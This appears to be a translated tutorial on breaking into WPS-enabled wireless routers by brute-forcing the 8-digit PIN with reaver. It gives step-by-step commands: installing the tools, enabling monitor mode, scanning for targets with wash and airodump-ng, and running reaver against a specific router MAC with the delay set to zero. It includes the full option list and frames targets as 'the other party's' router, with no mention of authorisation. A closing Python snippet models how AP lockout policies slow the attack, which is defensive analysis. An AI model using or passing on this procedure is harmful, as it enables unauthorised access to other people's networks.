Required tools: reaver

Principle: brute-force the WPS PIN code to break the wireless router's security protection.

Installation:

Download the source code. The reaver source is available from http://code.google.com/p/reaver-wps

    wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz

Unpack it:

    tar -xzvf reaver-1.4.tar.gz

Install the necessary dependency libraries and tools. Before you compile reaver you need to install libraries such as libpcap; later you also need aircrack-ng.

    sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev

Configure and compile Reaver:

    cd reaver-1.4
    cd src
    ./configure
    make

Install Reaver:

    sudo make install

Download and compile aircrack-ng. Starting with Ubuntu 12.04, aircrack-ng is no longer included in the software repository, but we can download its source code from the Internet and compile and install it. If aircrack-ng is already installed, you do not need to install it again.

    ./configure
    make
    sudo make install

Method:

1. Enter:

    airmon-ng start wlan0

Enables monitor mode (the screen shows that the 8187L driver loaded successfully; it loaded on the first try!).

2. Enter:

    wash -i mon0 -C

Lists all wireless routers with WPS enabled. If there is no response for a long time, press Ctrl + C to end the process, then write down the MAC of the target router you want to crack.

3. Enter:

    airodump-ng mon0

The NIC scans all channels in promiscuous mode and displays information about all APs (including AP signal strength, ESSID, MAC, channel, encryption method, etc.). Press Ctrl + C to end the scan.

Note: if you already know the other party's wireless router information, the scanning steps can be skipped!
4. Enter:

    reaver -i mon0 -b MAC -a -S -vv

This starts trying PIN codes. Note: you can press Ctrl + C at any time to exit and save the progress; next time, press the "up" cursor key and then Enter to continue from where you stopped.

In practice, I entered

    reaver -i mon0 -b D8:5D:4C:37:78:F6 -a -S -vv -d 0

(added -d 0 to speed things up) and watched the screen flash by ...... Awesome!

Reaver parameter description

Required Arguments:

    -i, --interface=<wlan>          Name of the monitor-mode interface to use (usually mon0)
    -b, --bssid=<mac>               BSSID of the target AP (the AP's MAC address)

Optional Arguments:

    -m, --mac=<mac>                 MAC of the host system (specifies the local MAC address)
    -e, --essid=<ssid>              ESSID of the target AP (generally does not need to be specified)
    -c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f); if not specified, channels are scanned automatically
    -o, --out-file=<file>           Send output to a log file [stdout]
    -s, --session=<file>            Restore a previous session file
    -C, --exec=<command>            Execute the supplied command upon successful pin recovery
    -D, --daemonize                 Daemonize reaver
    -a, --auto                      Auto detect the best advanced options for the target AP
    -f, --fixed                     Disable channel hopping
    -5, --5ghz                      Use 5GHz 802.11 channels
    -v, --verbose                   Display non-critical warnings (-vv for more)
    -q, --quiet                     Only display critical messages
    -h, --help                      Show help

Advanced Options:

    -p, --pin=<wps pin>             Use the specified 4 or 8 digit WPS pin
    -d, --delay=<seconds>           Set the delay between pin attempts [1] (default 1 second)
    -l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [60]
    -g, --max-attempts=<num>        Quit after num pin attempts
    -x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0] (default 0 seconds)
    -r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
    -t, --timeout=<seconds>         Set the receive timeout period [5] (default 5 seconds)
    -T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20] (default 0.2 seconds)
    -A, --no-associate              Do not associate with the AP (association must be done by another application)
    -N, --no-nacks                  Do not send NACK messages when out of order packets are received (if the pin stays unchanged, try this parameter)
    -S, --dh-small                  Use small DH keys to improve crack speed (recommended)
    -L, --ignore-locks              Ignore locked state reported by the target AP
    -E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
    -n, --nack                      Target AP always sends a NACK [Auto]
    -w, --win7                      Mimic a Windows 7 registrar [False] (disabled by default)

PS: many factors affect the wireless connection, so the way the parameters work together is very important. Of course, the most important thing is the signal.

Principle details:

What is a PIN code? A string of 8 digits printed on the label of the wireless router. It is also shown in the wireless router's management interface and can be changed there.

What is the use of the PIN code?
Entering the 8-digit numeric string from the wireless router into the companion management software of the wireless NIC (such as TP-LINK's QSS software) lets you successfully log on to the encrypted wireless router.

What does the PIN code mean? Now that we know the range of the wireless router's PIN value (8 digits, numeric only), and since WPS is currently enabled on most devices, brute-forcing the PIN code to break the security protection of the wireless router is theoretically feasible.
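An added example, not part of the original page: a small model of how an AP's WPS lockout policy changes the worst-case time needed to exhaust the PIN space discussed above. It relies on the WPS design fact that the PIN is confirmed in two halves with the last digit a checksum (at most 11,000 guesses); the policy names, failure thresholds and the rate of one guess per second are assumptions chosen for illustration.

```python
import math
from dataclasses import dataclass

# The page gives the PIN range as 8 digits (10^8 values). In the WPS protocol
# the two halves are confirmed separately (M4/M5, then M6/M7) and digit 8 is a
# checksum, so the worst case is 10^4 + 10^3 guesses.
WORST_CASE_GUESSES = 10 ** 4 + 10 ** 3


@dataclass
class LockoutPolicy:            # hypothetical AP-side settings
    name: str
    failures_before_lock: int   # 0 means the AP never locks WPS
    lock_seconds: float = 0.0   # duration of the first lock
    backoff: float = 1.0        # multiplier applied to each later lock
    max_lock_seconds: float = math.inf


def worst_case_seconds(policy, seconds_per_guess, guesses=WORST_CASE_GUESSES):
    """Upper bound on the time needed to try every candidate PIN."""
    total = guesses * seconds_per_guess
    if policy.failures_before_lock <= 0:
        return total
    # One lock after each full batch of failures; none after the final guess.
    locks = (guesses - 1) // policy.failures_before_lock
    lock = policy.lock_seconds
    for _ in range(locks):
        total += lock
        if math.isinf(total):
            break
        lock = min(lock * policy.backoff, policy.max_lock_seconds)
    return total


# Constructed sample policies; 60 s matches reaver's default --lock-delay.
POLICIES = [
    LockoutPolicy("no lockout", 0),
    LockoutPolicy("60 s after 3 failures", 3, 60.0),
    LockoutPolicy("doubling lock, 1 day cap", 3, 60.0, 2.0, 86400.0),
    LockoutPolicy("locked until reboot", 3, math.inf),
]


def report(seconds_per_guess=1.0):
    """Return (policy name, worst-case days) for each sample policy."""
    return [(p.name, worst_case_seconds(p, seconds_per_guess) / 86400)
            for p in POLICIES]


if __name__ == "__main__":
    for name, days in report():
        print(f"{name:26s} {days:12.1f} days")
```

A fixed 60-second lock only stretches the worst case from hours to a few days, while an escalating or until-reboot lock (or disabling WPS PIN entry altogether) takes exhaustion out of practical reach.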